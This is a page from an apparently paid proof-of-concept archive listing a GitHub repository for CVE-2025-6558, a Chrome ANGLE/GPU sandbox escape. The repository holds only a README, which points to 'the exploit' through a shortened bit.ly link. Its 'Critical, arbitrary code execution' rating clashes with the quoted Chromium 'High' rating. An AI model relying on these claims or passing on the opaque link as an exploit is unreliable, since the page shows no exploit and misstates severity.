Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-6558 PoC — Google Chrome 输入验证错误漏洞

Source
https://github.com/gmh5225/CVE-2025-6558-exp
Associated Vulnerability
Title:Google Chrome 输入验证错误漏洞 (CVE-2025-6558)
Description:Insufficient validation of untrusted input in ANGLE and GPU in Google Chrome prior to 138.0.7204.157 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Readme
# **CVE-2025-6558 - Google Chrome ANGLE/GPU Sandbox Escape**  

| **Field**         | **Details**                                                                 |
|-------------------|-----------------------------------------------------------------------------|
| **CVE ID**        | CVE-2025-6558                                                               |
| **Vulnerability Type** | Sandbox Escape                                                           |
| **Affected Application** | Google Chrome (ANGLE and GPU components)                                |
| **Severity**      | Critical – Enables remote arbitrary code execution and access to sensitive resources |
| **Affected Versions** | Google Chrome versions < `138.0.7204.157`                                 |
| **Exploitation Prerequisites** | User visits a webpage containing malicious WebGL/HTML content          |
| **POC Availability** | Confirmed                                                                 |

---

## Description
CVE-2025-6558 is a critical sandbox escape vulnerability in Google Chrome’s **ANGLE** (Almost Native Graphics Layer Engine) and **GPU components**. Insufficient validation of untrusted inputs in ANGLE/GPU processing allows remote attackers to craft malicious HTML pages that trigger this flaw.

## ⚠️ Disclaimer

This content is provided for **educational and research purposes** only.  
The author does **not condone** malicious activity or exploitation of systems without **explicit authorization**.

---

### Exploit
[**href**](http://bit.ly/4lAFDak)
File Snapshot

 [4.0K]  /data/pocs/24af1a3bf4e07946000381c727d8830291ba5dca
└── [1.5K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →